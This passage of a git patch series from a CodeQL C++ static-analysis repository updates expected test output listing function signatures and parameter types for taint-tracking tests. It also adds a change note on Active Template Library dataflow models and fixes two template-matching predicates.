taint.cpp:514:6:514:16 | test_strtok | 0 | char * | +| taint.cpp:523:7:523:13 | _strset | 0 | char * | +| taint.cpp:523:7:523:13 | _strset | 1 | int | +| taint.cpp:525:6:525:18 | test_strset_1 | 0 | char * | +| taint.cpp:525:6:525:18 | test_strset_1 | 1 | char | +| taint.cpp:531:6:531:18 | test_strset_2 | 0 | char * | +| taint.cpp:538:7:538:13 | mempcpy | 0 | void * | +| taint.cpp:538:7:538:13 | mempcpy | 1 | const void * | +| taint.cpp:538:7:538:13 | mempcpy | 2 | size_t | +| taint.cpp:540:6:540:17 | test_mempcpy | 0 | int * | +| taint.cpp:548:7:548:13 | memccpy | 0 | void * | +| taint.cpp:548:7:548:13 | memccpy | 1 | const void * | +| taint.cpp:548:7:548:13 | memccpy | 2 | int | +| taint.cpp:548:7:548:13 | memccpy | 3 | size_t | +| taint.cpp:550:6:550:17 | test_memccpy | 0 | int * | +| taint.cpp:558:7:558:12 | strcat | 0 | char * | +| taint.cpp:558:7:558:12 | strcat | 1 | const char * | +| taint.cpp:560:6:560:16 | test_strcat | 0 | char * | +| taint.cpp:560:6:560:16 | test_strcat | 1 | char * | +| taint.cpp:560:6:560:16 | test_strcat | 2 | char * | +| taint.cpp:560:6:560:16 | test_strcat | 3 | char * | +| taint.cpp:570:16:570:25 | _mbsncat_l | 0 | unsigned char * | +| taint.cpp:570:16:570:25 | _mbsncat_l | 1 | const unsigned char * | +| taint.cpp:570:16:570:25 | _mbsncat_l | 2 | int | +| taint.cpp:570:16:570:25 | _mbsncat_l | 3 | _locale_t | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 0 | unsigned char * | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 1 | const unsigned char * | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 2 | unsigned char * | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 3 | _locale_t | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 4 | _locale_t | +| taint.cpp:572:6:572:20 | test__mbsncat_l | 5 | int | +| taint.cpp:589:7:589:12 | strsep | 0 | char ** | +| taint.cpp:589:7:589:12 | strsep | 1 | const char * | +| taint.cpp:591:6:591:16 | test_strsep | 0 | char * | +| taint.cpp:602:7:602:13 | _strinc | 0 | const char * | +| taint.cpp:602:7:602:13 | _strinc | 1 | _locale_t | +| taint.cpp:603:16:603:22 | _mbsinc | 0 | const unsigned char * | +| taint.cpp:604:16:604:22 | _strdec | 0 | const unsigned char * | +| taint.cpp:604:16:604:22 | _strdec | 1 | const unsigned char * | +| taint.cpp:606:6:606:17 | test__strinc | 0 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 1 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 2 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 3 | char * | +| taint.cpp:606:6:606:17 | test__strinc | 4 | _locale_t | +| taint.cpp:616:6:616:17 | test__mbsinc | 0 | unsigned char * | +| taint.cpp:616:6:616:17 | test__mbsinc | 1 | char * | +| taint.cpp:616:6:616:17 | test__mbsinc | 2 | unsigned char * | +| taint.cpp:616:6:616:17 | test__mbsinc | 3 | char * | +| taint.cpp:626:6:626:17 | test__strdec | 0 | const unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 1 | unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 2 | unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 3 | unsigned char * | +| taint.cpp:626:6:626:17 | test__strdec | 4 | unsigned char * | +| taint.cpp:645:14:645:22 | _strnextc | 0 | const char * | +| taint.cpp:647:6:647:19 | test__strnextc | 0 | const char * | +| taint.cpp:659:7:659:7 | operator= | 0 | C_no_const_member_function && | +| taint.cpp:659:7:659:7 | operator= | 0 | const C_no_const_member_function & | +| taint.cpp:665:6:665:25 | test_no_const_member | 0 | char * | +| taint.cpp:671:7:671:7 | operator= | 0 | C_const_member_function && | +| taint.cpp:671:7:671:7 | operator= | 0 | const C_const_member_function & | +| taint.cpp:677:6:677:27 | test_with_const_member | 0 | char * | +| taint.cpp:683:6:683:20 | argument_source | 0 | void * | +| taint.cpp:685:8:685:8 | operator= | 0 | const two_members & | +| taint.cpp:685:8:685:8 | operator= | 0 | two_members && | +| taint.cpp:707:8:707:14 | strncpy | 0 | char * | +| taint.cpp:707:8:707:14 | strncpy | 1 | const char * | +| taint.cpp:707:8:707:14 | strncpy | 2 | unsigned long | +| taint.cpp:709:6:709:17 | test_strncpy | 0 | char * | +| taint.cpp:709:6:709:17 | test_strncpy | 1 | char * | +| taint.cpp:725:10:725:15 | strtol | 0 | const char * | +| taint.cpp:725:10:725:15 | strtol | 1 | char ** | +| taint.cpp:725:10:725:15 | strtol | 2 | int | +| taint.cpp:727:6:727:16 | test_strtol | 0 | char * | +| taint.cpp:735:7:735:12 | malloc | 0 | size_t | +| taint.cpp:736:7:736:13 | realloc | 0 | void * | +| taint.cpp:736:7:736:13 | realloc | 1 | size_t | +| taint.cpp:744:6:744:32 | test_realloc_2_indirections | 0 | int ** | +| taint.cpp:751:9:751:9 | operator= | 0 | A && | +| taint.cpp:751:9:751:9 | operator= | 0 | const A & | +| taint.cpp:758:5:758:11 | sprintf | 0 | char * | +| taint.cpp:758:5:758:11 | sprintf | 1 | const char * | +| taint.cpp:760:6:760:23 | call_sprintf_twice | 0 | char * | +| taint.cpp:760:6:760:23 | call_sprintf_twice | 1 | char * | +| taint.cpp:771:8:771:8 | operator= | 0 | TaintInheritingContentObject && | +| taint.cpp:771:8:771:8 | operator= | 0 | const TaintInheritingContentObject & | +| taint.cpp:775:30:775:35 | source | 0 | bool | +| taint.cpp:782:7:782:11 | fopen | 0 | const char * | +| taint.cpp:782:7:782:11 | fopen | 1 | const char * | +| taint.cpp:783:5:783:11 | fopen_s | 0 | FILE ** | +| taint.cpp:783:5:783:11 | fopen_s | 1 | const char * | +| taint.cpp:783:5:783:11 | fopen_s | 2 | const char * | +| taint.cpp:785:6:785:15 | fopen_test | 0 | char * | +| vector.cpp:13:6:13:9 | sink | 0 | int | +| vector.cpp:14:27:14:30 | sink | 0 | vector, allocator>, allocator, allocator>>> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | | vector.cpp:14:27:14:30 | sink | 0 | vector> & | +| vector.cpp:16:6:16:37 | test_range_based_for_loop_vector | 0 | int | +| vector.cpp:37:6:37:23 | test_element_taint | 0 | int | +| vector.cpp:145:8:145:8 | operator= | 0 | MyPair && | +| vector.cpp:145:8:145:8 | operator= | 0 | const MyPair & | +| vector.cpp:150:8:150:8 | MyVectorContainer | 0 | const MyVectorContainer & | +| vector.cpp:150:8:150:8 | operator= | 0 | MyVectorContainer && | +| vector.cpp:150:8:150:8 | operator= | 0 | const MyVectorContainer & | +| vector.cpp:216:6:216:9 | sink | 0 | iterator & | +| vector.cpp:231:6:231:9 | sink | 0 | vector> & | +| vector.cpp:232:6:232:9 | sink | 0 | vector> & | +| vector.cpp:279:6:279:9 | sink | 0 | int * | +| vector.cpp:295:6:295:9 | sink | 0 | iterator | +| vector.cpp:329:6:329:33 | taint_vector_output_iterator | 0 | iterator | +| vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | 0 | iterator | +| vector.cpp:333:6:333:35 | vector_iterator_assign_wrapper | 1 | int | +| vector.cpp:337:6:337:32 | test_vector_output_iterator | 0 | int | +| vector.cpp:417:6:417:25 | test_vector_inserter | 0 | char * | +| vector.cpp:454:7:454:12 | memcpy | 0 | void * | +| vector.cpp:454:7:454:12 | memcpy | 1 | const void * | +| vector.cpp:454:7:454:12 | memcpy | 2 | size_t | +| vector.cpp:461:6:461:9 | sink | 0 | vector> & | +| vector.cpp:462:6:462:9 | sink | 0 | string & | +| zmq.cpp:9:8:9:8 | operator= | 0 | const zmq_msg_t & | +| zmq.cpp:9:8:9:8 | operator= | 0 | zmq_msg_t && | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 0 | zmq_msg_t * | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 1 | void * | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 2 | size_t | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 3 | zmq_free_fn * | +| zmq.cpp:14:5:14:21 | zmq_msg_init_data | 4 | void * | +| zmq.cpp:15:7:15:18 | zmq_msg_data | 0 | zmq_msg_t * | +| zmq.cpp:17:6:17:13 | test_zmc | 0 | void * | +| zmq.cpp:17:6:17:13 | test_zmc | 1 | char * | +| zmq.cpp:17:6:17:13 | test_zmc | 2 | size_t | From 02428745bdf126588ddb42522042dfa78a46ee67 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 16:12:58 +0000 Subject: [PATCH 0752/1267] C++: Add change note. --- cpp/ql/src/change-notes/2024-11-27-active-template-library.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-11-27-active-template-library.md diff --git a/cpp/ql/src/change-notes/2024-11-27-active-template-library.md b/cpp/ql/src/change-notes/2024-11-27-active-template-library.md new file mode 100644 index 00000000000..a677ac66107 --- /dev/null +++ b/cpp/ql/src/change-notes/2024-11-27-active-template-library.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added dataflow models and flow sources for Microsoft's Active Template Library (ATL). \ No newline at end of file From 3c0af498db588c2fd3974fd64f58687b33360581 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 19:04:25 +0000 Subject: [PATCH 0753/1267] C++: Fix bug introduced in an earlier commit and accept test changes. They all look good. --- .../semmle/code/cpp/dataflow/ExternalFlow.qll | 4 +- .../taint-tests/test_mad-signatures.expected | 193 ------------------ 2 files changed, 2 insertions(+), 195 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll index ac10651b551..9496bfe98ba 100644 --- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll @@ -437,13 +437,13 @@ private predicate elementSpec( private predicate isClassConstructedFrom(Class c, Class templateClass) { c.isConstructedFrom(templateClass) or - not any(Class c_).isConstructedFrom(templateClass) and c = templateClass + not c.isConstructedFrom(_) and c = templateClass } private predicate isFunctionConstructedFrom(Function f, Function templateFunc) { f.isConstructedFrom(templateFunc) or - not any(Function f_).isConstructedFrom(templateFunc) and f = templateFunc + not f.isConstructedFrom(_) and f = templateFunc } /** Gets the fully templated version of `f`. */ diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 1f84cd3379a..0d121219209 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -76,15 +76,6 @@ signatureMatches | constructor_delegation.cpp:10:2:10:8 | MyValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | constructor_delegation.cpp:19:2:19:15 | MyDerivedValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | standalone_iterators.cpp:103:27:103:36 | operator+= | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| stl.h:165:8:165:16 | push_back | (char) | CComBSTR | Append | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | deque | assign | 1 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | forward_list | assign | 1 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | list | assign | 1 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 0 | -| stl.h:181:47:181:52 | append | (InputIt,InputIt) | vector | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | deque | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | forward_list | assign | 0 | @@ -93,14 +84,6 @@ signatureMatches | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | list | assign | 1 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 0 | | stl.h:182:17:182:22 | assign | (InputIt,InputIt) | vector | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | deque | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | forward_list | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | list | assign | 1 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 0 | -| stl.h:184:47:184:52 | assign | (InputIt,InputIt) | vector | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | deque | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | forward_list | assign | 0 | @@ -109,18 +92,6 @@ signatureMatches | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | list | assign | 1 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 0 | | stl.h:185:17:185:22 | insert | (InputIt,InputIt) | vector | assign | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | deque | insert | 2 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | forward_list | insert_after | 2 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | list | insert | 2 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 0 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 1 | -| stl.h:189:42:189:47 | insert | (const_iterator,InputIt,InputIt) | vector | insert | 2 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 0 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 1 | | stl.h:190:17:190:23 | replace | (const_iterator,InputIt,InputIt) | deque | insert | 2 | @@ -561,13 +532,10 @@ getParameterTypeName | atl.cpp:69:3:69:15 | _U_STRINGorID | 0 | LPCTSTR | | atl.cpp:193:10:193:12 | Add | 0 | INARGTYPclass:0 | | atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray & | -| atl.cpp:195:10:195:15 | Append | 0 | const CAtlArray> & | | atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray & | -| atl.cpp:196:8:196:11 | Copy | 0 | const CAtlArray> & | | atl.cpp:198:6:198:10 | GetAt | 0 | size_t | | atl.cpp:202:8:202:20 | InsertArrayAt | 0 | size_t | | atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray * | -| atl.cpp:202:8:202:20 | InsertArrayAt | 1 | const CAtlArray> * | | atl.cpp:203:8:203:15 | InsertAt | 0 | size_t | | atl.cpp:203:8:203:15 | InsertAt | 1 | INARGTYPclass:0 | | atl.cpp:203:8:203:15 | InsertAt | 2 | size_t | @@ -577,10 +545,8 @@ getParameterTypeName | atl.cpp:256:3:256:10 | CAtlList | 0 | UINT | | atl.cpp:259:12:259:18 | AddHead | 0 | INARGTYPclass:0 | | atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList * | -| atl.cpp:260:8:260:18 | AddHeadList | 0 | const CAtlList> * | | atl.cpp:262:12:262:18 | AddTail | 0 | INARGTYPclass:0 | | atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList * | -| atl.cpp:263:8:263:18 | AddTailList | 0 | const CAtlList> * | | atl.cpp:264:12:264:15 | Find | 0 | INARGTYPclass:0 | | atl.cpp:264:12:264:15 | Find | 1 | POSITION | | atl.cpp:265:12:265:20 | FindIndex | 0 | size_t | @@ -633,12 +599,10 @@ getParameterTypeName | atl.cpp:537:3:537:15 | CComSafeArray | 0 | const SAFEARRAY * | | atl.cpp:541:11:541:13 | Add | 0 | const SAFEARRAY * | | atl.cpp:543:11:543:13 | Add | 0 | const class:0 & | -| atl.cpp:543:11:543:13 | Add | 0 | const int & | | atl.cpp:543:11:543:13 | Add | 1 | BOOL | | atl.cpp:551:6:551:10 | GetAt | 0 | LONG | | atl.cpp:562:11:562:15 | SetAt | 0 | LONG | | atl.cpp:562:11:562:15 | SetAt | 1 | const class:0 & | -| atl.cpp:562:11:562:15 | SetAt | 1 | const int & | | atl.cpp:562:11:562:15 | SetAt | 2 | BOOL | | atl.cpp:564:6:564:15 | operator[] | 0 | long | | atl.cpp:565:6:565:15 | operator[] | 0 | int | @@ -651,33 +615,21 @@ getParameterTypeName | atl.cpp:619:22:619:33 | CommonPrefix | 0 | PCXSTR | | atl.cpp:656:23:656:32 | operator+= | 0 | PCXSTR | | atl.cpp:716:8:716:10 | Add | 0 | const class:0 & | -| atl.cpp:716:8:716:10 | Add | 0 | const int & | | atl.cpp:717:7:717:10 | Find | 0 | const class:0 & | -| atl.cpp:717:7:717:10 | Find | 0 | const int & | | atl.cpp:728:6:728:15 | operator[] | 0 | int | | atl.cpp:729:21:729:29 | operator= | 0 | const CSimpleArray & | -| atl.cpp:762:8:762:10 | Add | 0 | char *const & | | atl.cpp:762:8:762:10 | Add | 0 | const class:0 & | | atl.cpp:762:8:762:10 | Add | 1 | const class:1 & | -| atl.cpp:762:8:762:10 | Add | 1 | wchar_t *const & | -| atl.cpp:763:7:763:13 | FindKey | 0 | char *const & | | atl.cpp:763:7:763:13 | FindKey | 0 | const class:0 & | | atl.cpp:764:7:764:13 | FindVal | 0 | const class:1 & | -| atl.cpp:764:7:764:13 | FindVal | 0 | wchar_t *const & | | atl.cpp:767:9:767:18 | GetValueAt | 0 | int | -| atl.cpp:768:8:768:13 | Lookup | 0 | char *const & | | atl.cpp:768:8:768:13 | Lookup | 0 | const class:0 & | | atl.cpp:772:8:772:20 | ReverseLookup | 0 | const class:1 & | -| atl.cpp:772:8:772:20 | ReverseLookup | 0 | wchar_t *const & | -| atl.cpp:773:8:773:12 | SetAt | 0 | char *const & | | atl.cpp:773:8:773:12 | SetAt | 0 | const class:0 & | | atl.cpp:773:8:773:12 | SetAt | 1 | const class:1 & | -| atl.cpp:773:8:773:12 | SetAt | 1 | wchar_t *const & | | atl.cpp:774:8:774:17 | SetAtIndex | 0 | int | -| atl.cpp:774:8:774:17 | SetAtIndex | 1 | char *const & | | atl.cpp:774:8:774:17 | SetAtIndex | 1 | const class:0 & | | atl.cpp:774:8:774:17 | SetAtIndex | 2 | const class:1 & | -| atl.cpp:774:8:774:17 | SetAtIndex | 2 | wchar_t *const & | | atl.cpp:813:9:813:17 | operator= | 0 | const CUrl & | | atl.cpp:815:3:815:6 | CUrl | 0 | const CUrl & | | atl.cpp:818:15:818:26 | Canonicalize | 0 | DWORD | @@ -826,7 +778,6 @@ getParameterTypeName | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | | stl.h:29:34:29:40 | forward | 0 | remove_reference_t & | -| stl.h:29:34:29:40 | forward | 0 | remove_reference_t> & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | @@ -835,8 +786,6 @@ getParameterTypeName | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | | stl.h:49:3:49:10 | iterator | 0 | const iterator & | -| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | -| stl.h:49:3:49:10 | iterator | 0 | const iterator, ptrdiff_t, pair *, pair &> & | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | | stl.h:52:12:52:21 | operator++ | 0 | int | @@ -849,7 +798,6 @@ getParameterTypeName | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | | stl.h:56:8:56:17 | operator!= | 0 | iterator | -| stl.h:56:8:56:17 | operator!= | 0 | iterator, ptrdiff_t, pair *, pair &> | | stl.h:59:12:59:20 | operator+ | 0 | int | | stl.h:60:12:60:20 | operator- | 0 | int | | stl.h:61:13:61:22 | operator+= | 0 | int | @@ -868,92 +816,51 @@ getParameterTypeName | stl.h:72:9:72:9 | operator= | 0 | output_iterator_tag && | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | | stl.h:86:22:86:41 | back_insert_iterator | 0 | class:0 & | -| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector, allocator>, allocator, allocator>>> & | -| stl.h:86:22:86:41 | back_insert_iterator | 0 | vector> & | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:88:25:88:33 | operator= | 0 | value_type && | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:91:24:91:33 | operator++ | 0 | int | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | | stl.h:95:44:95:44 | back_inserter | 0 | func:0 & | -| stl.h:95:44:95:44 | back_inserter | 0 | vector, allocator>, allocator, allocator>>> & | -| stl.h:95:44:95:44 | back_inserter | 0 | vector> & | -| stl.h:147:12:147:23 | basic_string | 0 | const allocator & | -| stl.h:148:3:148:14 | basic_string | 0 | const char * | | stl.h:148:3:148:14 | basic_string | 0 | const class:2 & | -| stl.h:148:3:148:14 | basic_string | 1 | const allocator & | | stl.h:149:33:149:44 | basic_string | 0 | const class:0 * | -| stl.h:149:33:149:44 | basic_string | 0 | func:0 | | stl.h:149:33:149:44 | basic_string | 1 | const class:2 & | -| stl.h:149:33:149:44 | basic_string | 1 | func:0 | -| stl.h:149:33:149:44 | basic_string | 2 | const allocator & | | stl.h:151:16:151:20 | c_str | 0 | func:0 | | stl.h:151:16:151:20 | c_str | 1 | func:0 | | stl.h:151:16:151:20 | c_str | 2 | const class:2 & | -| stl.h:165:8:165:16 | push_back | 0 | char | | stl.h:173:13:173:22 | operator[] | 0 | size_type | | stl.h:175:13:175:14 | at | 0 | size_type | -| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | -| stl.h:176:35:176:44 | operator+= | 0 | const func:0 & | | stl.h:176:35:176:44 | operator+= | 0 | size_type | | stl.h:176:35:176:44 | operator+= | 0 | size_type | -| stl.h:177:17:177:26 | operator+= | 0 | const char * | | stl.h:177:17:177:26 | operator+= | 0 | const func:0 & | -| stl.h:178:17:178:22 | append | 0 | const basic_string, allocator> & | | stl.h:178:17:178:22 | append | 0 | const class:0 * | | stl.h:179:17:179:22 | append | 0 | const basic_string & | -| stl.h:179:17:179:22 | append | 0 | const char * | | stl.h:180:17:180:22 | append | 0 | const class:0 * | -| stl.h:180:17:180:22 | append | 0 | size_type | -| stl.h:180:17:180:22 | append | 1 | char | -| stl.h:181:47:181:52 | append | 0 | func:0 | | stl.h:181:47:181:52 | append | 0 | size_type | | stl.h:181:47:181:52 | append | 1 | class:0 | -| stl.h:181:47:181:52 | append | 1 | func:0 | -| stl.h:182:17:182:22 | assign | 0 | const basic_string, allocator> & | | stl.h:182:17:182:22 | assign | 0 | func:0 | | stl.h:182:17:182:22 | assign | 1 | func:0 | | stl.h:183:17:183:22 | assign | 0 | const basic_string & | -| stl.h:183:17:183:22 | assign | 0 | size_type | -| stl.h:183:17:183:22 | assign | 1 | char | -| stl.h:184:47:184:52 | assign | 0 | func:0 | | stl.h:184:47:184:52 | assign | 0 | size_type | | stl.h:184:47:184:52 | assign | 1 | class:0 | -| stl.h:184:47:184:52 | assign | 1 | func:0 | | stl.h:185:17:185:22 | insert | 0 | func:0 | -| stl.h:185:17:185:22 | insert | 0 | size_type | -| stl.h:185:17:185:22 | insert | 1 | const basic_string, allocator> & | | stl.h:185:17:185:22 | insert | 1 | func:0 | | stl.h:186:17:186:22 | insert | 0 | size_type | | stl.h:186:17:186:22 | insert | 1 | const basic_string & | -| stl.h:186:17:186:22 | insert | 1 | size_type | -| stl.h:186:17:186:22 | insert | 2 | char | | stl.h:187:17:187:22 | insert | 0 | size_type | -| stl.h:187:17:187:22 | insert | 1 | const char * | | stl.h:187:17:187:22 | insert | 1 | size_type | | stl.h:187:17:187:22 | insert | 2 | class:0 | -| stl.h:188:12:188:17 | insert | 0 | const_iterator | | stl.h:188:12:188:17 | insert | 0 | size_type | | stl.h:188:12:188:17 | insert | 1 | const class:0 * | -| stl.h:188:12:188:17 | insert | 1 | size_type | -| stl.h:188:12:188:17 | insert | 2 | char | | stl.h:189:42:189:47 | insert | 0 | const_iterator | -| stl.h:189:42:189:47 | insert | 1 | func:0 | | stl.h:189:42:189:47 | insert | 1 | size_type | | stl.h:189:42:189:47 | insert | 2 | class:0 | -| stl.h:189:42:189:47 | insert | 2 | func:0 | | stl.h:190:17:190:23 | replace | 0 | const_iterator | -| stl.h:190:17:190:23 | replace | 0 | size_type | | stl.h:190:17:190:23 | replace | 1 | func:0 | -| stl.h:190:17:190:23 | replace | 1 | size_type | -| stl.h:190:17:190:23 | replace | 2 | const basic_string, allocator> & | | stl.h:190:17:190:23 | replace | 2 | func:0 | | stl.h:191:17:191:23 | replace | 0 | size_type | | stl.h:191:17:191:23 | replace | 1 | size_type | | stl.h:191:17:191:23 | replace | 2 | const basic_string & | -| stl.h:191:17:191:23 | replace | 2 | size_type | -| stl.h:191:17:191:23 | replace | 3 | char | -| stl.h:192:13:192:16 | copy | 0 | char * | | stl.h:192:13:192:16 | copy | 0 | size_type | | stl.h:192:13:192:16 | copy | 1 | size_type | | stl.h:192:13:192:16 | copy | 2 | size_type | @@ -961,18 +868,11 @@ getParameterTypeName | stl.h:193:8:193:12 | clear | 0 | class:0 * | | stl.h:193:8:193:12 | clear | 1 | size_type | | stl.h:193:8:193:12 | clear | 2 | size_type | -| stl.h:194:16:194:21 | substr | 0 | size_type | -| stl.h:194:16:194:21 | substr | 1 | size_type | -| stl.h:195:8:195:11 | swap | 0 | basic_string, allocator> & | | stl.h:195:8:195:11 | swap | 0 | size_type | | stl.h:195:8:195:11 | swap | 1 | size_type | | stl.h:198:94:198:102 | operator+ | 0 | const basic_string & | -| stl.h:198:94:198:102 | operator+ | 0 | const basic_string, allocator> & | | stl.h:198:94:198:102 | operator+ | 1 | const basic_string & | -| stl.h:198:94:198:102 | operator+ | 1 | const basic_string, allocator> & | | stl.h:199:94:199:102 | operator+ | 0 | const basic_string & | -| stl.h:199:94:199:102 | operator+ | 0 | const basic_string, allocator> & | -| stl.h:199:94:199:102 | operator+ | 1 | const char * | | stl.h:199:94:199:102 | operator+ | 1 | const func:0 * | | stl.h:214:33:214:42 | operator>> | 0 | int & | | stl.h:217:33:217:35 | get | 0 | char_type & | @@ -989,49 +889,26 @@ getParameterTypeName | stl.h:226:32:226:38 | getline | 1 | streamsize | | stl.h:226:32:226:38 | getline | 2 | char_type | | stl.h:229:68:229:77 | operator>> | 0 | basic_istream & | -| stl.h:229:68:229:77 | operator>> | 0 | basic_istream> & | -| stl.h:229:68:229:77 | operator>> | 1 | char * | | stl.h:229:68:229:77 | operator>> | 1 | func:0 * | | stl.h:230:85:230:94 | operator>> | 0 | basic_istream & | -| stl.h:230:85:230:94 | operator>> | 0 | basic_istream> & | | stl.h:230:85:230:94 | operator>> | 1 | basic_string & | -| stl.h:230:85:230:94 | operator>> | 1 | basic_string, allocator> & | | stl.h:232:84:232:90 | getline | 0 | basic_istream & | -| stl.h:232:84:232:90 | getline | 0 | basic_istream> & | | stl.h:232:84:232:90 | getline | 1 | basic_string & | -| stl.h:232:84:232:90 | getline | 1 | basic_string, allocator> & | -| stl.h:232:84:232:90 | getline | 2 | char | | stl.h:232:84:232:90 | getline | 2 | func:0 | | stl.h:233:84:233:90 | getline | 0 | basic_istream & | -| stl.h:233:84:233:90 | getline | 0 | basic_istream> & | | stl.h:233:84:233:90 | getline | 1 | basic_string & | -| stl.h:233:84:233:90 | getline | 1 | basic_string, allocator> & | | stl.h:240:33:240:42 | operator<< | 0 | int | | stl.h:242:33:242:35 | put | 0 | char_type | | stl.h:243:33:243:37 | write | 0 | const char_type * | | stl.h:243:33:243:37 | write | 1 | streamsize | | stl.h:247:67:247:76 | operator<< | 0 | basic_ostream & | -| stl.h:247:67:247:76 | operator<< | 0 | basic_ostream> & | -| stl.h:247:67:247:76 | operator<< | 1 | const char * | | stl.h:247:67:247:76 | operator<< | 1 | const func:0 * | | stl.h:248:85:248:94 | operator<< | 0 | basic_ostream & | -| stl.h:248:85:248:94 | operator<< | 0 | basic_ostream> & | | stl.h:248:85:248:94 | operator<< | 1 | const basic_string & | -| stl.h:248:85:248:94 | operator<< | 1 | const basic_string, allocator> & | | stl.h:259:12:259:29 | basic_stringstream | 0 | const 